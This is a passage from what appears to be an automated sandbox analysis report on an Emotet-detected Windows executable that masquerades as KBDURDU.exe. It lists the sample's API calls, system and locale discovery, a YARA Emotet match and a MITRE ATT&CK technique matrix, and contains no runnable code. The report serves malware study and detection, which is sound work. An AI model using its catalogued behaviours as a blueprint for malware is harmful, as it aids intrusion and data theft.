      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_0041EDFA SetUnhandledExceptionFilter,1_2_0041EDFA

      Source: KBDURDU.exe, 00000001.00000002.1471201156.0000000000CF0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: KBDURDU.exe, 00000001.00000002.1471201156.0000000000CF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: KBDURDU.exe, 00000001.00000002.1471201156.0000000000CF0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: KBDURDU.exe, 00000001.00000002.1471201156.0000000000CF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: GetLocaleInfoA,_strncpy,0_2_00426DDE
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: _strlen,EnumSystemLocalesA,0_2_004272FD
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: _strlen,_strlen,EnumSystemLocalesA,0_2_00427334
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: _strlen,EnumSystemLocalesA,0_2_004273BA
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,0_2_004293B8
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: GetLocaleInfoA,MultiByteToWideChar,0_2_00429474
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,0_2_0042740F
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,0_2_004294E8
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: GetLocaleInfoW,WideCharToMultiByte,0_2_0042959B
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: GetLocaleInfoA,0_2_004277B6
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_0040136B
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,0_2_0046BC16
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,1_2_004293B8
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: GetLocaleInfoA,MultiByteToWideChar,1_2_00429474
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,1_2_004294E8
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: GetLocaleInfoW,WideCharToMultiByte,1_2_0042959B
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,1_2_0040136B
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: GetLocaleInfoA,_strncpy,1_2_00426DDE
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: _strlen,EnumSystemLocalesA,1_2_004272FD
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: _strlen,_strlen,EnumSystemLocalesA,1_2_00427334
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: _strlen,EnumSystemLocalesA,1_2_004273BA
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,1_2_0042740F
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: GetLocaleInfoA,1_2_004277B6
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,1_2_0046BC16
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0041E125 cpuid 0_2_0041E125
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0041735D GetSystemTimeAsFileTime,__aulldiv,0_2_0041735D
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0041D4D6 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,0_2_0041D4D6
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004082C9 GetVersionExA,0_2_004082C9
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected EmotetShow sources
      Source: Yara matchFile source: 00000000.00000002.1065940307.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.1471371090.0000000002190000.00000040.00000001.sdmp, type: MEMORY

      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00473101 CreateBindCtx,lstrlenW,lstrlenA,CoTaskMemFree,0_2_00473101
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0047371B lstrlenA,lstrlenW,lstrlenW,lstrlenW,CoTaskMemAlloc,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,0_2_0047371B
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00473101 CreateBindCtx,lstrlenW,lstrlenA,CoTaskMemFree,1_2_00473101
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_0047371B lstrlenA,lstrlenW,lstrlenW,lstrlenW,CoTaskMemAlloc,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,1_2_0047371B

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsExecution through API1Hidden Files and Directories1Process Injection2Masquerading12Input Capture2System Time Discovery2Remote File Copy1Input Capture2Exfiltration Over Alternative Protocol1Standard Cryptographic Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesHidden Files and Directories1Network SniffingProcess Discovery3Remote ServicesData from Removable MediaData Encrypted1Uncommonly Used Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionProcess Injection2Input CaptureApplication Window Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCommonly Used Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingDeobfuscate/Decode Files or Information1Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedRemote File Copy1SIM Card SwapPremium SMS Toll Fraud
      Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessFile Deletion1Account ManipulationSystem Information Discovery37Shared WebrootData StagedScheduled TransferStandard Non-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information2Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsStandard Application Layer Protocol21Jamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.